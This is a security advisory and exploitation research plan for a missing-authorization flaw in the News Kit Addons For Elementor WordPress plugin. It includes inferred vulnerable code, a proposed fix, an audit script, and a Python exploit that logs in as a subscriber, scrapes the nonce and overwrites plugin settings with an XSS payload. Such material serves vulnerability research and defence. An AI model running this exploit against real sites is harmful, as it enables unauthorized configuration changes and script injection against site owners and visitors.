CVE-2026-25416

News Kit Addons For Elementor <= 1.4.2 - Missing Authorization

Severity: Medium (Missing Authorization)
CVSS Score: 4.3
Patched in: Unpatched
Time to patch: N/A

Description

The News Kit Addons For Elementor plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.4.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 1.4.2
Published: January 28, 2026
Last updated: February 26, 2026
Research Plan
Unverified


Exploitation Research Plan - CVE-2026-25416

1. Vulnerability Summary

The News Kit Addons For Elementor plugin (versions <= 1.4.2) contains a missing authorization vulnerability in its AJAX settings handling. Specifically, an administrative AJAX action (likely news_kit_save_settings) verifies a security nonce but performs no capability check (e.g., current_user_can('manage_options')). A nonce only proves that the request originated from a page WordPress rendered for that same user; it is a CSRF defence, not an authorization decision. Any authenticated user who can load the page carrying the nonce, including one with Subscriber-level permissions, can therefore call the handler and modify plugin settings or perform other restricted actions.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Vulnerable Action: news_kit_save_settings (inferred based on plugin architecture)
  • HTTP Method: POST, form-encoded (admin-ajax.php reads its parameters from $_POST/$_REQUEST; a JSON request body is not parsed)
  • Authentication: Required (Subscriber or higher)
  • Parameters:
    • action: news_kit_save_settings
    • security: A valid nonce (action: news-kit-admin-nonce)
    • settings: An array or JSON string representing the plugin settings to be updated.
  • Preconditions: The plugin must localize the admin nonce in a way that is accessible to Subscriber-level users in the WordPress dashboard (e.g., on the Profile page).

3. Code Flow (Inferred)

  1. Registration: In admin/class-news-kit-admin.php (or similar), the plugin registers the AJAX handler:
    add_action( 'wp_ajax_news_kit_save_settings', array( $this, 'news_kit_save_settings' ) );
  2. Entry Point: A Subscriber makes a POST request to admin-ajax.php with action=news_kit_save_settings.
  3. Nonce Check: The function news_kit_save_settings calls check_ajax_referer( 'news-kit-admin-nonce', 'security' );.
  4. Missing Check: The function lacks a current_user_can( 'manage_options' ) check.
  5. Sink: The function processes $_POST['settings'] and calls update_option( 'news_kit_settings', ... );, allowing the attacker to overwrite plugin configurations.

4. Nonce Acquisition Strategy

The nonce is likely localized for the admin dashboard. Since Subscribers can access wp-admin/profile.php, we can extract it there.

  1. Check Script Localization: Search the codebase for wp_localize_script.
    • grep -r "wp_localize_script" .
  2. Identify Variable: Look for a variable containing a nonce (e.g., news_kit_admin_vars, news_kit_obj).
  3. JS Evaluation:
    • Use browser_navigate to go to http://localhost:8080/wp-admin/profile.php as the Subscriber user.
    • Use browser_eval to extract the nonce:
      browser_eval("window.news_kit_admin_vars?.security") (Verify variable name in source).

5. Exploitation Strategy

  1. Prepare Subscriber Session: Authenticate as a Subscriber and obtain the session cookies.
  2. Identify Target Option: We will target the news_kit_settings option. A successful exploit will overwrite this option with a custom value.
  3. Craft Payload (shown as JSON for readability; on the wire these are form fields such as settings[some_vulnerable_setting]=..., since admin-ajax.php reads $_POST):
    {
      "action": "news_kit_save_settings",
      "security": "[EXTRACTED_NONCE]",
      "settings": {
        "some_vulnerable_setting": "<script>alert('XSS')</script>",
        "disabled_modules": []
      }
    }

  4. Execute Request: Use http_request to send the POST payload to admin-ajax.php.
  5. Verify Change: Check the database/options state to confirm the settings were updated.
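As an added example (not code from this page, the plugin, or its vendor), the script below carries out sections 4 and 5 against a lab instance: it logs in as the Subscriber, scrapes the localized nonce from profile.php, and sends the request form-encoded rather than as JSON. The action name news_kit_save_settings, the JS object news_kit_admin_vars, its security key and the POST field name security are the research plan's inferences and are treated here as assumptions to be confirmed by the grep step; the embedded profile-page snippet is constructed for the demo.

```python
import http.cookiejar
import json
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Iterator, Optional, Tuple

# Constructed stand-in for the <script> block wp_localize_script() would emit on
# profile.php if the plugin enqueues its admin script there (assumption).
SAMPLE_PROFILE_HTML = """
<script id="news-kit-admin-js-extra">
var news_kit_admin_vars = {"ajax_url":"http:\\/\\/localhost:8080\\/wp-admin\\/admin-ajax.php","security":"8f3a2b91c0"};
</script>
"""


def extract_localized_nonce(html: str, var_name: str, key: str = "security") -> Optional[str]:
    """Return data[key] from the `var <var_name> = {...};` line wp_localize_script() renders."""
    m = re.search(r"var\s+" + re.escape(var_name) + r"\s*=\s*(\{.*?\});", html, re.S)
    if not m:
        return None
    try:
        data = json.loads(m.group(1))  # wp_localize_script() emits JSON (slashes escaped)
    except json.JSONDecodeError:
        return None
    value = data.get(key)
    return value if isinstance(value, str) else None


def php_form_fields(value, prefix: str) -> Iterator[Tuple[str, str]]:
    """Flatten nested data into the bracketed field names PHP turns back into arrays.

    {"a": "x", "mods": ["p", "q"]} under prefix "settings" becomes
    settings[a]=x, settings[mods][]=p, settings[mods][]=q.  An empty list or dict
    produces no field at all: form encoding cannot express an empty PHP array.
    """
    if isinstance(value, dict):
        for k, v in value.items():
            yield from php_form_fields(v, f"{prefix}[{k}]")
    elif isinstance(value, (list, tuple)):
        for v in value:
            yield from php_form_fields(v, f"{prefix}[]")
    else:
        yield prefix, "" if value is None else str(value)


def build_ajax_body(action: str, nonce: str, settings: dict) -> str:
    """application/x-www-form-urlencoded body; admin-ajax.php does not parse JSON bodies."""
    fields = [("action", action), ("security", nonce)]
    fields.extend(php_form_fields(settings, "settings"))
    return urllib.parse.urlencode(fields)


def run_against_lab(base_url: str, username: str, password: str, settings: dict,
                    action: str = "news_kit_save_settings",
                    js_var: str = "news_kit_admin_vars") -> dict:
    """Log in as the low-privilege user, harvest the nonce from profile.php, send the request."""
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(http.cookiejar.CookieJar()))
    opener.open(f"{base_url}/wp-login.php")  # sets wordpress_test_cookie, which the form requires
    login = urllib.parse.urlencode({
        "log": username, "pwd": password, "wp-submit": "Log In", "testcookie": "1",
        "redirect_to": f"{base_url}/wp-admin/profile.php",
    }).encode()
    opener.open(f"{base_url}/wp-login.php", login)

    with opener.open(f"{base_url}/wp-admin/profile.php") as resp:
        nonce = extract_localized_nonce(resp.read().decode("utf-8", "replace"), js_var)
    if nonce is None:
        raise RuntimeError(f"{js_var} is not localized on profile.php; precondition not met")

    req = urllib.request.Request(
        f"{base_url}/wp-admin/admin-ajax.php",
        data=build_ajax_body(action, nonce, settings).encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"})
    try:
        with opener.open(req) as resp:
            return {"status": resp.status, "body": resp.read().decode("utf-8", "replace")}
    except urllib.error.HTTPError as err:  # a failed check_ajax_referer() answers 403 with "-1"
        return {"status": err.code, "body": err.read().decode("utf-8", "replace")}


if __name__ == "__main__":
    nonce = extract_localized_nonce(SAMPLE_PROFILE_HTML, "news_kit_admin_vars")
    print(build_ajax_body("news_kit_save_settings", nonce,
                          {"some_vulnerable_setting": "<script>alert(1)</script>",
                           "disabled_modules": []}))
```

Only extract_localized_nonce() and build_ajax_body() run offline; run_against_lab() is meant for the http://localhost:8080 instance the plan describes, and the name parameters exist so the confirmed action, JS object and nonce field can be dropped in once the grep step has settled them.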

6. Test Data Setup

  1. Install Plugin: Ensure news-kit-elementor-addons <= 1.4.2 is active.
  2. Create User:
    • wp user create attacker attacker@example.com --role=subscriber --user_pass=password
  3. Initial State: Note the current value of the settings:
    • wp option get news_kit_settings

7. Expected Results

  • The AJAX request should return a 200 OK response with a JSON success message (e.g., {"success":true}).
  • The WordPress option news_kit_settings should be updated to match the payload provided by the Subscriber.

8. Verification Steps

  1. Check Option via CLI:
    • wp option get news_kit_settings
    • Confirm the output matches the injected settings payload.
  2. Check the Activity Log: If a security or activity-logging plugin is active, it may record the option update as performed by the 'attacker' user.

9. Alternative Approaches

If news_kit_save_settings is not the correct action:

  1. Discovery: Run grep -rn "add_action.*wp_ajax_" . to find all registered AJAX actions.
  2. Capability Audit: For each handler, check if current_user_can is present.
  3. Generic Settings Update: Look for actions that use update_option directly with user-supplied keys, which might allow updating core WordPress options like users_can_register.
  4. License Actions: Check news_kit_license_active or similar actions that might be intended for administrators but lack authorization.

Important Grep Targets:

# Find all AJAX actions
grep -r "wp_ajax_" .

# Find where the nonce is created
grep -r "wp_create_nonce" .

# Find the localized script variable
grep -r "wp_localize_script" .

The nonce action to look for is most likely news-kit-admin-nonce, or whichever nonce is created in a class related to Admin or Settings; the JS object is likely news_kit_admin_vars. Both names are inferred and should be confirmed with the greps above before any request is crafted.
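The capability audit in section 9 is done by hand with grep; as an added example (not code from this page or the plugin), the script below automates that triage: it lists every wp_ajax_* registration, brace-matches its way to each callback's body, and reports handlers that check a nonce but never consult a capability. The SAMPLE_PHP source and every name in it are constructed for the demo and are not the plugin's code.

```python
import re
from pathlib import Path
from typing import Dict, List, Optional

# Constructed sample in the shape of a typical plugin admin class; names are hypothetical.
SAMPLE_PHP = """<?php
class Sample_Admin {
    public function __construct() {
        add_action( 'wp_ajax_sample_save_settings', array( $this, 'save_settings' ) );
        add_action( 'wp_ajax_sample_reset_cache', [ $this, 'reset_cache' ] );
        add_action( 'wp_ajax_nopriv_sample_track', 'sample_track_view' );
    }
    public function save_settings() {
        check_ajax_referer( 'sample-admin-nonce', 'security' );
        if ( isset( $_POST['settings'] ) ) {
            update_option( 'sample_settings', $_POST['settings'] );
        }
        wp_send_json_success();
    }
    public function reset_cache() {
        check_ajax_referer( 'sample-admin-nonce', 'security' );
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_send_json_error( 'forbidden' );
        }
        delete_transient( 'sample_cache' );
        wp_send_json_success();
    }
}
function sample_track_view() {
    update_option( 'sample_views', 1 );
    wp_send_json_success();
}
"""

REGISTER_RE = re.compile(
    r"""add_action\(\s*['"]wp_ajax_(?P<nopriv>nopriv_)?(?P<action>[\w-]+)['"]\s*,\s*(?:"""
    r"""array\(\s*\$this\s*,\s*['"](?P<method>\w+)['"]\s*\)"""   # array( $this, 'method' )
    r"""|\[\s*\$this\s*,\s*['"](?P<method2>\w+)['"]\s*\]"""       # [ $this, 'method' ]
    r"""|['"](?P<func>\w+)['"]"""                                  # 'plain_function'
    r""")""",
    re.S,
)
NONCE_RE = re.compile(r"check_ajax_referer|check_admin_referer|wp_verify_nonce")
CAP_RE = re.compile(r"current_user_can|user_can\s*\(|is_super_admin")


def function_body(source: str, name: str) -> Optional[str]:
    """Body of `function name(...) {...}`, found by brace matching.

    Braces inside strings or comments are not understood; good enough for triage.
    """
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*(?::\s*\??[\w\\]+\s*)?\{", source)
    if not m:
        return None
    start, depth = m.end() - 1, 0
    for i in range(start, len(source)):
        if source[i] == "{":
            depth += 1
        elif source[i] == "}":
            depth -= 1
            if depth == 0:
                return source[start:i + 1]
    return None


def audit_ajax_handlers(source: str) -> List[Dict[str, object]]:
    """One record per wp_ajax_* registration, in registration order."""
    records = []
    for m in REGISTER_RE.finditer(source):
        callback = m.group("method") or m.group("method2") or m.group("func")
        body = function_body(source, callback)
        records.append({
            "action": m.group("action"),
            "nopriv": m.group("nopriv") is not None,
            "callback": callback,
            "found": body is not None,
            "nonce_check": bool(body and NONCE_RE.search(body)),
            "cap_check": bool(body and CAP_RE.search(body)),
        })
    return records


def unprotected(records: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Handlers whose body was located and never consults a capability.

    nopriv handlers stay in the list: they run for anonymous callers, so a state
    change inside one deserves a manual look even though a capability check is moot there.
    """
    return [r for r in records if r["found"] and not r["cap_check"]]


def audit_plugin_dir(root: str) -> List[Dict[str, object]]:
    """Concatenate every .php file under root so a callback registered in one file
    and defined in another still resolves (first definition wins on name clashes)."""
    source = "\n".join(p.read_text(errors="replace") for p in sorted(Path(root).rglob("*.php")))
    return audit_ajax_handlers(source)


if __name__ == "__main__":
    for r in unprotected(audit_ajax_handlers(SAMPLE_PHP)):
        kind = "nopriv" if r["nopriv"] else "auth"
        print(f"{kind:6} {r['action']:<22} -> {r['callback']}() nonce={r['nonce_check']} cap={r['cap_check']}")
```

Point audit_plugin_dir() at the unpacked news-kit-elementor-addons directory to get the same report for the real code; a handler that appears with nonce=True and cap=False is the pattern this CVE describes, and a nopriv handler that writes options is the "generic settings update" case section 9 warns about.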

Research Findings
Static analysis — not yet PoC-verified

Summary

The News Kit Addons For Elementor plugin for WordPress is vulnerable to unauthorized settings modification due to a missing capability check in its AJAX handler, inferred to be news_kit_save_settings. Authenticated attackers with subscriber-level permissions can obtain a valid security nonce from the admin dashboard and use it to pass the handler's nonce check, which is the only gate the handler applies, and overwrite the plugin's stored options.

Vulnerable Code

// admin/class-news-kit-admin.php (Inferred from research plan)
add_action( 'wp_ajax_news_kit_save_settings', array( $this, 'news_kit_save_settings' ) );

---

// admin/class-news-kit-admin.php (Inferred from research plan)
public function news_kit_save_settings() {
    // CSRF check only: the nonce proves the request came from a page rendered
    // for this user, which any logged-in role that sees the localized script can pass.
    check_ajax_referer( 'news-kit-admin-nonce', 'security' );

    // Missing: a capability check such as current_user_can( 'manage_options' ).
    if ( isset( $_POST['settings'] ) ) {
        $settings = $_POST['settings']; // raw, slashed request data, stored as-is
        update_option( 'news_kit_settings', $settings );
        wp_send_json_success();
    }
}

Security Fix

--- news-kit-elementor-addons/admin/class-news-kit-admin.php
+++ news-kit-elementor-addons/admin/class-news-kit-admin.php
@@ -10,6 +10,10 @@
 public function news_kit_save_settings() {
     check_ajax_referer( 'news-kit-admin-nonce', 'security' );
 
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_send_json_error( array( 'message' => 'Unauthorized' ) );
+    }
+
     if ( isset( $_POST['settings'] ) ) {
         $settings = $_POST['settings'];
         update_option( 'news_kit_settings', $settings );
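Review bot: the page lists the plugin as Unpatched with no fixed version, so this hunk is a proposed fix rather than the vendor's patch, and the `--- news-kit-elementor-addons/admin/class-news-kit-admin.php` header should not be read as a confirmed file path or line offset. Within the hunk, placing the capability check after `check_ajax_referer()` is fine, and no explicit `return` is needed after `wp_send_json_error()` because it terminates the request through `wp_die()`. What the hunk leaves untouched is the sink: `$settings = $_POST['settings'];` still flows into `update_option()` without `wp_unslash()` and without validation, so even a legitimate administrator call stores slashed, arbitrary data. Suggest `$settings = wp_unslash( $_POST['settings'] );` followed by per-key sanitization against the set of settings the plugin actually defines, so that the option cannot hold unexpected keys or unescaped markup.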

Exploit Outline

  1. Authenticate to the WordPress site as a user with Subscriber-level access.
  2. Access an administrative page reachable by low-level users, such as `wp-admin/profile.php`, and inspect the page source to extract the nonce value (created for the `news-kit-admin-nonce` action) from the localized JavaScript variable `news_kit_admin_vars`. Both names are inferred from the plugin's architecture, not confirmed.
  3. Send a form-encoded POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `news_kit_save_settings`.
  4. Include the extracted nonce in the `security` parameter.
  5. Include a `settings` parameter containing the configuration data to be modified (e.g., custom module settings, or an XSS payload if the plugin renders a setting without escaping).
  6. Verify the settings were updated by observing the plugin's behavior or checking the database state if access is available.
